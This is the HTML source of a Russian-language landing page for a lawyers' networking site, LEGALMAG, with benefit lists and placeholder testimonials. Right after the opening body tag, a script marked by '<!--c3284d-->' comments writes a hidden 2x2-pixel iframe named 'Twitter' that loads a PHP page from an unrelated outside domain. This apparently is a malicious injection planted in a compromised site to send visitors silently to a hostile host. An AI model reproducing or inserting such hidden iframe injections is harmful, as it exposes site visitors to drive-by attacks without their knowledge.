<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="login">
					<a class="enter" href="">Войти</a>
					<a class="register" href="">Зарегистрироваться</a>
				</div>
				<nav><!--top-navigation-->
					<ul>
						<li class="active"><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<div id="benefitsBlock">
					<img src="design/img/benefits.png" alt="">
					<div class="right">
						<p>Вы юрист?</p>
						<span>Зарегистрируйтесь и получите доступ к новым возможностям!</span>
						<div id="jurRegister">
							<a href="">
							Начать пользоваться &raquo;<br>
							<span>бесплатно</span>
							</a>
						</div>
					</div>
				</div>
				<ul id="benefitsDescription">
					<li>
						<dl>
							<dt><img src="design/img/benefit-01.png" alt=""></dt>
							<dd><span>Даем возможность заявить о себе</span></dd>
							<dd>Получите уникальный рекламный инструмент: таргетированные объявления на Legalmag</dd>
						</dl>
					</li>
					<li>
						<dl>
							<dt><img src="design/img/benefit-02.png" alt=""></dt>
							<dd><span>Помогаем заработать</span></dd>
							<dd>С помощью конструктора документов вы можете самостоятельно сделать необходимый вам договор или</dd>
						</dl>
					</li>
					<li>
						<dl>
							<dt><img src="design/img/benefit-03.png" alt=""></dt>
							<dd><span>Даем работу</span></dd>
							<dd>Вы можете опубликовать постоянную или временную рабоу для сообщества юристов LegalMag</dd>
						</dl>
					</li>
					<li>
						<dl>
							<dt><img src="design/img/benefit-04.png" alt=""></dt>
							<dd><span>Даем возможность заявить о себе</span></dd>
							<dd>Новости законодательства и судебной практики в вашем личном кабинете</dd>
						</dl>
					</li>
					<li>
						<dl>
							<dt><img src="design/img/benefit-05.png" alt=""></dt>
							<dd><span>Держим вас в курсе правовых событий</span></dd>
							<dd>Подробные профили и возможность указать на себя на карте позволит вам не потеряться среди конкурентов</dd>
						</dl>
					</li>
				</ul>
				<div id="join"><h2>LegalMag пользуются тысячи юристов.</h2><a href="">Присоединяйтесь &raquo;</a></div>
				<div class="clear">&nbsp;</div>
				<div class="benefitsComment">
					<div class="left">
						<img  src="design/images/pasha.jpg" alt="">
					</div>
					<div class="right">
						<div class="benefitCommentBody">
							<h2>Вы не потеряетесь в большом каталоге юристов: система рейтингов </h2>
							<p>Разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: </p>
							<div class="benefitsCommentSay"></div>
						</div>
					</div>
					<div class="clear">&nbsp;</div>
					<div class="benefitsAuthor"><span>Иванов Иван</span>, директор мира</div>
					<div class="clear">&nbsp;</div>
				</div>
				<div class="benefitsComment">
					<div class="left">
						<div class="benefitCommentBody">
							<h2>Вы не потеряетесь в большом каталоге юристов: система рейтингов </h2>
							<p>Разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: </p>
							<div class="benefitsCommentSayRight"></div>
						</div>
					</div>
					<div class="right">
						<img  src="design/images/pasha.jpg" alt="">
					</div>
					<div class="clear">&nbsp;</div>
					<div class="benefitsAuthorLeft"><span>Иванов Иван</span>, директор мира</div>
				</div>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>